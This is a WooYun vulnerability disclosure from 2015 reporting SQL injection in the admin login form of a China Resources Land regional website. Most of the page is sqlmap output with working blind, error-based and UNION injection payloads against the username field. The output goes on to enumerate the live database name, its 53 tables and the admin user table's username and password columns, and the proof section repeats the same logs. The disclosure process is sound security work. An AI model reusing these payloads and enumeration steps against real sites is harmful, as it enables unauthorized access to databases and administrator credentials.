当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112130

漏洞标题:华润置地某站存在sql注入

相关厂商:crland.com.hk

漏洞作者: 路人甲

提交时间:2015-05-05 11:18

修复时间:2015-06-23 15:16

公开时间:2015-06-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经确认,细节仅向厂商公开
2015-05-19: 细节向核心白帽子及相关领域专家公开
2015-05-29: 细节向普通白帽子公开
2015-06-08: 细节向实习白帽子公开
2015-06-23: 细节向公众公开

简要描述:

华润置地某站存在sql注入

详细说明:

问题站点http://bj.crland.com.cn/ 后台登陆框post注入


http://bj.crland.com.cn/manage/后台登陆框post注入,抓包sqlmap跑

D:\Python27\sqlmap>sqlmap.py -r 1.txt
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:43:36
[10:43:36] [INFO] parsing HTTP request from '1.txt'
[10:43:36] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:43:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:43:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:43:36] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'


6.png


D:\Python27\sqlmap>sqlmap.py -r 1.txt --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:45:32
[10:45:32] [INFO] parsing HTTP request from '1.txt'
[10:45:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:45:32] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:45:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:45:32] [INFO] fetching current database
current database: 'hrzd'
[10:45:32] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'
D:\Python27\sqlmap>sqlmap.py -r 1.txt -D "hrzd" --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:46:43
[10:46:43] [INFO] parsing HTTP request from '1.txt'
[10:46:43] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:46:43] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:46:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:46:43] [INFO] fetching tables for database: hrzd
[10:46:43] [INFO] the SQL query used returns 53 entries
Database: hrzd
[53 tables]
+----------------------+
| banner_img2 |
| cms_ad_class |
| cms_ad_file |
| cms_ad_mess |
| cms_admin_files |
| cms_admin_menu |
| cms_admin_role |
| cms_admin_user |
| cms_admin_userrole |
| cms_area_city |
| cms_area_news_column |
| cms_area_news_info |
| cms_area_province |
| cms_bq_info |
| cms_config |
| cms_files_images |
| cms_files_info |
| cms_files_kind |
| cms_friend_info |
| cms_gg_info |
| cms_hy_info |
| cms_hy_jf |
| cms_jytd_news_column |
| cms_jytd_news_info |
| cms_magazine_column |
| cms_magazine_info |
| cms_maps_info |
| cms_member_info |
| cms_member_kind |
| cms_member_level |
| cms_member_point |
| cms_menu_list |
| cms_message_center |
| cms_news_column |
| cms_news_comments |
| cms_news_info |
| cms_news_pic |
| cms_person_info |
| cms_position_info |
| cms_qixia_column |
| cms_qixia_info |
| cms_question_info |
| cms_related_news |
| cms_relates_our |
| cms_reply_info |
| cms_role_function |
| cms_shenqing_info |
| cms_smtp |
| cms_user_column |
| cms_ziliao |
| dtproperties |
| sysconstraints |
| syssegments |
+----------------------+
[10:46:43] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'


7.png


D:\Python27\sqlmap>sqlmap.py -r 1.txt -D "hrzd" -T "cms_admin_user" --columns
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:48:32
[10:48:32] [INFO] parsing HTTP request from '1.txt'
[10:48:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:48:32] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:48:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:48:32] [INFO] fetching columns for table 'cms_admin_user' in database 'hrzd'
[10:48:32] [INFO] the SQL query used returns 10 entries
[10:48:32] [INFO] resumed: "ADD_TIME","datetime"
[10:48:32] [INFO] resumed: "column_uuid","varchar"
[10:48:32] [INFO] resumed: "END_TIME","datetime"
[10:48:32] [INFO] resumed: "is_child","bit"
[10:48:32] [INFO] resumed: "IS_USE","bit"
[10:48:32] [INFO] resumed: "PASSWORD","varchar"
[10:48:32] [INFO] resumed: "START_TIME","datetime"
[10:48:32] [INFO] resumed: "USER_TYPE","varchar"
[10:48:32] [INFO] resumed: "USERNAME","varchar"
[10:48:32] [INFO] resumed: "UUID","varchar"
Database: hrzd
Table: cms_admin_user
[10 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ADD_TIME | datetime |
| column_uuid | varchar |
| END_TIME | datetime |
| is_child | bit |
| IS_USE | bit |
| PASSWORD | varchar |
| START_TIME | datetime |
| USER_TYPE | varchar |
| USERNAME | varchar |
| UUID | varchar |
+-------------+----------+
[10:48:32] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'


8.png

漏洞证明:

问题站点http://bj.crland.com.cn/ 后台登陆框post注入


http://bj.crland.com.cn/manage/后台登陆框post注入,抓包sqlmap跑

D:\Python27\sqlmap>sqlmap.py -r 1.txt
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:43:36
[10:43:36] [INFO] parsing HTTP request from '1.txt'
[10:43:36] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:43:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:43:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:43:36] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'


6.png


D:\Python27\sqlmap>sqlmap.py -r 1.txt --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:45:32
[10:45:32] [INFO] parsing HTTP request from '1.txt'
[10:45:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:45:32] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:45:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:45:32] [INFO] fetching current database
current database: 'hrzd'
[10:45:32] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\bj.crland.com.cn'
D:\Python27\sqlmap>sqlmap.py -r 1.txt -D "hrzd" --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150127}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:46:43
[10:46:43] [INFO] parsing HTTP request from '1.txt'
[10:46:43] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:46:43] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin'; IF(7117=7117) SELECT 7117 ELSE DROP FUNCTION IxKh--&pa
ssword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' AND 5296=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(9
8)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5296=5296) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'ktez'='ktez&pas
sword=1111&DropDownList1=chs&checker=t688D&ImageButton1.x=41&ImageButton1.y=14
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: __VIEWSTATE=/wEPDwUKMTY1OTM1MDcyNWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMZAftmt4P06vFlHy4MjDSOOTRjeb&__EVENTVALIDATION=
/wEWBwLa/JS1AgKvpuq2CALyveCRDwL1+N3JBQKmi72KBgLDp/68BgLSwpnTCA0kl1Kkk40PQ/2E3qWf
oGPs/V9W&username=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107
)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(66)+CHAR(103)+CHAR(109)+CHAR(101)+CHAR(69)+C
HAR(99)+CHAR(71)+CHAR(71)+CHAR(89)+CHAR(89)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(1
20)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &password=1111&DropDownList1=chs&checke
r=t688D&ImageButton1.x=41&ImageButton1.y=14
---
[10:46:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[10:46:43] [INFO] fetching tables for database: hrzd
[10:46:43] [INFO] the SQL query used returns 53 entries
Database: hrzd
